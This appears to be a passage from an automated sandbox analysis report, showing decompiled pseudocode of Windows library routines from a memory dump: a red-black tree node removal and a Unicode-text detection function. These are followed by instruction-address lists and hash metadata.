															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                                                                                    0x00a9b095
                                                                                                    0x00a9b09b
                                                                                                    0x00a9b09f
                                                                                                    0x00a9b0a5
                                                                                                    0x00a9b0a7
                                                                                                    0x00a9b0aa
                                                                                                    0x00a9b0ad
                                                                                                    0x00a9b0b1
                                                                                                    0x00a9b3f8
                                                                                                    0x00a9b3fa
                                                                                                    0x00a9b3ff
                                                                                                    0x00a9b419
                                                                                                    0x00a9b41b
                                                                                                    0x00a9b41b
                                                                                                    0x00a9b401
                                                                                                    0x00000000
                                                                                                    0x00a9b0b7
                                                                                                    0x00a9b0b9
                                                                                                    0x00a9b0bc
                                                                                                    0x00a9b0c0
                                                                                                    0x00a9b0c2
                                                                                                    0x00a9b0c2
                                                                                                    0x00a9b0c4
                                                                                                    0x00a9b0c8
                                                                                                    0x00a9b0cf
                                                                                                    0x00a9b0d1
                                                                                                    0x00a9b0d1
                                                                                                    0x00a9b0da
                                                                                                    0x00a9b0dd
                                                                                                    0x00a9b0df
                                                                                                    0x00a9b0df
                                                                                                    0x00a9b0e4
                                                                                                    0x00a9b0e9
                                                                                                    0x00a9b3e2
                                                                                                    0x00a9b3e5
                                                                                                    0x00a9b3eb
                                                                                                    0x00aea676
                                                                                                    0x00aea67b
                                                                                                    0x00aea67d
                                                                                                    0x00a9b3f1
                                                                                                    0x00a9b3f1
                                                                                                    0x00a9b3f1
                                                                                                    0x00a9b0ef
                                                                                                    0x00a9b0ef
                                                                                                    0x00a9b0ef
                                                                                                    0x00a9b0e9
                                                                                                    0x00a9b0f6
                                                                                                    0x00a9b28d
                                                                                                    0x00a9b28e
                                                                                                    0x00a9b293
                                                                                                    0x00a9b0fc
                                                                                                    0x00a9b0fc
                                                                                                    0x00a9b101
                                                                                                    0x00a9b104
                                                                                                    0x00a9b107
                                                                                                    0x00a9b10c
                                                                                                    0x00aea687
                                                                                                    0x00aea68d
                                                                                                    0x00aea68d
                                                                                                    0x00aea687
                                                                                                    0x00a9b112
                                                                                                    0x00a9b116
                                                                                                    0x00aea696
                                                                                                    0x00aea69c
                                                                                                    0x00aea69c
                                                                                                    0x00aea696
                                                                                                    0x00a9b120
                                                                                                    0x00a9b121
                                                                                                    0x00a9b124
                                                                                                    0x00a9b127
                                                                                                    0x00a9b12a
                                                                                                    0x00a9b12d
                                                                                                    0x00a9b132
                                                                                                    0x00aea6a5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aea6ab
                                                                                                    0x00000000
                                                                                                    0x00a9b138
                                                                                                    0x00a9b138
                                                                                                    0x00a9b13a
                                                                                                    0x00a9b193
                                                                                                    0x00a9b197
                                                                                                    0x00a9b19d
                                                                                                    0x00a9b29c
                                                                                                    0x00a9b29f
                                                                                                    0x00a9b2a2
                                                                                                    0x00a9b2a7
                                                                                                    0x00aea6d2
                                                                                                    0x00aea6d8
                                                                                                    0x00aea6d8
                                                                                                    0x00aea6d2
                                                                                                    0x00a9b2af
                                                                                                    0x00a9b420
                                                                                                    0x00a9b422
                                                                                                    0x00a9b423
                                                                                                    0x00000000
                                                                                                    0x00a9b2b5
                                                                                                    0x00a9b2b5
                                                                                                    0x00a9b2ba
                                                                                                    0x00aea6e1
                                                                                                    0x00aea6e7
                                                                                                    0x00aea6e7
                                                                                                    0x00aea6e1
                                                                                                    0x00a9b2c2
                                                                                                    0x00000000
                                                                                                    0x00a9b2c8
                                                                                                    0x00a9b2cb
                                                                                                    0x00a9b2d0
                                                                                                    0x00aea6f0
                                                                                                    0x00aea6f6
                                                                                                    0x00aea6f6
                                                                                                    0x00aea6f0
                                                                                                    0x00a9b2d8
                                                                                                    0x00000000
                                                                                                    0x00a9b2de
                                                                                                    0x00a9b2de
                                                                                                    0x00a9b2de
                                                                                                    0x00a9b2e1
                                                                                                    0x00a9b2e6
                                                                                                    0x00a9b2eb
                                                                                                    0x00aea6ff
                                                                                                    0x00aea705
                                                                                                    0x00aea705
                                                                                                    0x00aea6ff
                                                                                                    0x00a9b2f3
                                                                                                    0x00000000
                                                                                                    0x00a9b2f9
                                                                                                    0x00a9b2fb
                                                                                                    0x00a9b2fd
                                                                                                    0x00a9b301
                                                                                                    0x00a9b303
                                                                                                    0x00a9b303
                                                                                                    0x00a9b308
                                                                                                    0x00a9b30b
                                                                                                    0x00a9b310
                                                                                                    0x00a9b312
                                                                                                    0x00a9b312
                                                                                                    0x00a9b31c
                                                                                                    0x00a9b322
                                                                                                    0x00a9b327
                                                                                                    0x00aea70e
                                                                                                    0x00a9b335
                                                                                                    0x00a9b337
                                                                                                    0x00aea71d
                                                                                                    0x00aea723
                                                                                                    0x00aea723
                                                                                                    0x00aea71d
                                                                                                    0x00a9b340
                                                                                                    0x00a9b345
                                                                                                    0x00a9b349
                                                                                                    0x00aea72a
                                                                                                    0x00aea72a
                                                                                                    0x00a9b352
                                                                                                    0x00a9b357
                                                                                                    0x00a9b359
                                                                                                    0x00a9b359
                                                                                                    0x00a9b365
                                                                                                    0x00a9b367
                                                                                                    0x00a9b36c
                                                                                                    0x00000000
                                                                                                    0x00a9b36c
                                                                                                    0x00aea714
                                                                                                    0x00aea714
                                                                                                    0x00a9b32f
                                                                                                    0x00a9b3b8
                                                                                                    0x00a9b3bd
                                                                                                    0x00a9b3c4
                                                                                                    0x00a9b425
                                                                                                    0x00a9b427
                                                                                                    0x00a9b429
                                                                                                    0x00a9b429
                                                                                                    0x00a9b427
                                                                                                    0x00a9b3c8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9b3ce
                                                                                                    0x00a9b42f
                                                                                                    0x00a9b3d0
                                                                                                    0x00a9b3d0
                                                                                                    0x00a9b3d0
                                                                                                    0x00a9b3d7
                                                                                                    0x00a9b3da
                                                                                                    0x00a9b3da
                                                                                                    0x00000000
                                                                                                    0x00a9b32f
                                                                                                    0x00a9b2f3
                                                                                                    0x00a9b2d8
                                                                                                    0x00a9b2c2
                                                                                                    0x00a9b2af
                                                                                                    0x00a9b1a3
                                                                                                    0x00a9b1a9
                                                                                                    0x00a9b1af
                                                                                                    0x00a9b1b2
                                                                                                    0x00a9b1b5
                                                                                                    0x00a9b1b8
                                                                                                    0x00aea733
                                                                                                    0x00aea739
                                                                                                    0x00aea739
                                                                                                    0x00aea733
                                                                                                    0x00a9b1c0
                                                                                                    0x00000000
                                                                                                    0x00a9b1c6
                                                                                                    0x00a9b1c8
                                                                                                    0x00a9b1cb
                                                                                                    0x00a9b1ce
                                                                                                    0x00a9b1d3
                                                                                                    0x00aea742
                                                                                                    0x00aea748
                                                                                                    0x00aea748
                                                                                                    0x00aea742
                                                                                                    0x00a9b1db
                                                                                                    0x00000000
                                                                                                    0x00a9b1e1
                                                                                                    0x00a9b1e1
                                                                                                    0x00a9b1e6
                                                                                                    0x00a9b1e9
                                                                                                    0x00a9b1ee
                                                                                                    0x00aea751
                                                                                                    0x00a9b409
                                                                                                    0x00a9b409
                                                                                                    0x00a9b40e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9b410
                                                                                                    0x00a9b22d
                                                                                                    0x00a9b22f
                                                                                                    0x00aea790
                                                                                                    0x00aea796
                                                                                                    0x00aea796
                                                                                                    0x00aea790
                                                                                                    0x00a9b23d
                                                                                                    0x00a9b243
                                                                                                    0x00a9b248
                                                                                                    0x00aea79f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aea7a5
                                                                                                    0x00000000
                                                                                                    0x00a9b24e
                                                                                                    0x00a9b24e
                                                                                                    0x00a9b250
                                                                                                    0x00a9b374
                                                                                                    0x00a9b379
                                                                                                    0x00a9b37e
                                                                                                    0x00aea7ae
                                                                                                    0x00aea7b4
                                                                                                    0x00aea7b4
                                                                                                    0x00aea7ae
                                                                                                    0x00a9b386
                                                                                                    0x00000000
                                                                                                    0x00a9b38c
                                                                                                    0x00a9b38e
                                                                                                    0x00aea7bd
                                                                                                    0x00a9b394
                                                                                                    0x00a9b394
                                                                                                    0x00a9b394
                                                                                                    0x00a9b39b
                                                                                                    0x00a9b39e
                                                                                                    0x00000000
                                                                                                    0x00a9b39e
                                                                                                    0x00a9b386
                                                                                                    0x00a9b256
                                                                                                    0x00a9b258
                                                                                                    0x00aea7c6
                                                                                                    0x00aea7cc
                                                                                                    0x00aea7cc
                                                                                                    0x00aea7c6
                                                                                                    0x00a9b261
                                                                                                    0x00a9b266
                                                                                                    0x00a9b26a
                                                                                                    0x00aea7d3
                                                                                                    0x00aea7d3
                                                                                                    0x00a9b273
                                                                                                    0x00a9b278
                                                                                                    0x00a9b27a
                                                                                                    0x00a9b27a
                                                                                                    0x00a9b281
                                                                                                    0x00a9b283
                                                                                                    0x00a9b285
                                                                                                    0x00a9b287
                                                                                                    0x00a9b289
                                                                                                    0x00000000
                                                                                                    0x00a9b289
                                                                                                    0x00a9b248
                                                                                                    0x00aea757
                                                                                                    0x00aea757
                                                                                                    0x00a9b1f6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9b1fc
                                                                                                    0x00a9b201
                                                                                                    0x00aea760
                                                                                                    0x00aea766
                                                                                                    0x00aea766
                                                                                                    0x00aea760
                                                                                                    0x00a9b209
                                                                                                    0x00a9b3a8
                                                                                                    0x00aea76f
                                                                                                    0x00a9b3ae
                                                                                                    0x00a9b3ae
                                                                                                    0x00a9b3ae
                                                                                                    0x00a9b3b0
                                                                                                    0x00000000
                                                                                                    0x00a9b20f
                                                                                                    0x00a9b20f
                                                                                                    0x00a9b213
                                                                                                    0x00aea778
                                                                                                    0x00aea77e
                                                                                                    0x00aea77e
                                                                                                    0x00aea778
                                                                                                    0x00a9b21b
                                                                                                    0x00000000
                                                                                                    0x00a9b221
                                                                                                    0x00a9b223
                                                                                                    0x00aea787
                                                                                                    0x00a9b229
                                                                                                    0x00a9b229
                                                                                                    0x00a9b229
                                                                                                    0x00a9b22b
                                                                                                    0x00000000
                                                                                                    0x00a9b22b
                                                                                                    0x00a9b21b
                                                                                                    0x00a9b209
                                                                                                    0x00a9b1db
                                                                                                    0x00a9b142
                                                                                                    0x00a9b142
                                                                                                    0x00a9b146
                                                                                                    0x00a9b148
                                                                                                    0x00a9b14c
                                                                                                    0x00a9b14f
                                                                                                    0x00a9b154
                                                                                                    0x00a9b15b
                                                                                                    0x00aea6b4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aea6ba
                                                                                                    0x00aea6ba
                                                                                                    0x00a9b163
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9b163
                                                                                                    0x00a9b13a
                                                                                                    0x00a9b169
                                                                                                    0x00a9b16b
                                                                                                    0x00a9b16e
                                                                                                    0x00a9b171
                                                                                                    0x00a9b175
                                                                                                    0x00a9b178
                                                                                                    0x00aea6c3
                                                                                                    0x00aea6c9
                                                                                                    0x00aea6c9
                                                                                                    0x00aea6c3
                                                                                                    0x00a9b180
                                                                                                    0x00a9b184
                                                                                                    0x00000000
                                                                                                    0x00a9b104
                                                                                                    0x00a9b0f6

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                                                    • Instruction ID: 1df54579a2790c4cda336eea9736c653abc12580d837b75c1f2c6dbb109dc30c
                                                                                                    • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                                                    • Instruction Fuzzy Hash: BED1E2357243568BCF21CF69E6C02AAB7F1AFA5754B388168DC65CF282E731DC41A760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A80D20, Relevance: .4, Instructions: 372COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 99%
                                                                                                    			E00A80D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0xb76d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0xb76920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0xb76920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0xa81174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M00A81160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                                                                                    0x00a80d2b
                                                                                                    0x00a80d2e
                                                                                                    0x00a80d32
                                                                                                    0x00a80d39
                                                                                                    0x00a80d3b
                                                                                                    0x00a80d3d
                                                                                                    0x00a80d3f
                                                                                                    0x00a80d46
                                                                                                    0x00a80d4d
                                                                                                    0x00a80d54
                                                                                                    0x00a80d5b
                                                                                                    0x00a80d62
                                                                                                    0x00a80d69
                                                                                                    0x00a80d70
                                                                                                    0x00a80d77
                                                                                                    0x00a80d7e
                                                                                                    0x00a80d85
                                                                                                    0x00a80d88
                                                                                                    0x00a80d8b
                                                                                                    0x00a80d8e
                                                                                                    0x00a80d91
                                                                                                    0x00a80d94
                                                                                                    0x00a80d97
                                                                                                    0x00a80d9a
                                                                                                    0x00a80d9d
                                                                                                    0x00a80da6
                                                                                                    0x00a810e9
                                                                                                    0x00a810ee
                                                                                                    0x00a80db9
                                                                                                    0x00a80db9
                                                                                                    0x00a80dbc
                                                                                                    0x00ade9c7
                                                                                                    0x00ade9ca
                                                                                                    0x00ade9cd
                                                                                                    0x00ade9d0
                                                                                                    0x00ade9dd
                                                                                                    0x00ade9dd
                                                                                                    0x00a80dec
                                                                                                    0x00a80dec
                                                                                                    0x00a80dee
                                                                                                    0x00a80df3
                                                                                                    0x00a80ebf
                                                                                                    0x00a80ec0
                                                                                                    0x00000000
                                                                                                    0x00a80df9
                                                                                                    0x00a80df9
                                                                                                    0x00a80e1e
                                                                                                    0x00a80e21
                                                                                                    0x00a80e24
                                                                                                    0x00a80e27
                                                                                                    0x00a80e2a
                                                                                                    0x00a80e2d
                                                                                                    0x00a80e30
                                                                                                    0x00a80e36
                                                                                                    0x00a81040
                                                                                                    0x00a81043
                                                                                                    0x00a81049
                                                                                                    0x00a81049
                                                                                                    0x00a80e3c
                                                                                                    0x00a80e3f
                                                                                                    0x00a81007
                                                                                                    0x00a8100a
                                                                                                    0x00a81010
                                                                                                    0x00a81010
                                                                                                    0x00a8100a
                                                                                                    0x00a80e3f
                                                                                                    0x00a80e58
                                                                                                    0x00a80e5d
                                                                                                    0x00a81000
                                                                                                    0x00a80e63
                                                                                                    0x00a80e63
                                                                                                    0x00a80e63
                                                                                                    0x00a80e67
                                                                                                    0x00a80e69
                                                                                                    0x00a80e69
                                                                                                    0x00a80e6d
                                                                                                    0x00a80e70
                                                                                                    0x00a80e74
                                                                                                    0x00a80e76
                                                                                                    0x00a80e76
                                                                                                    0x00a80e7a
                                                                                                    0x00a80e7c
                                                                                                    0x00a80e7c
                                                                                                    0x00a80e83
                                                                                                    0x00a80e86
                                                                                                    0x00a80e87
                                                                                                    0x00a80e89
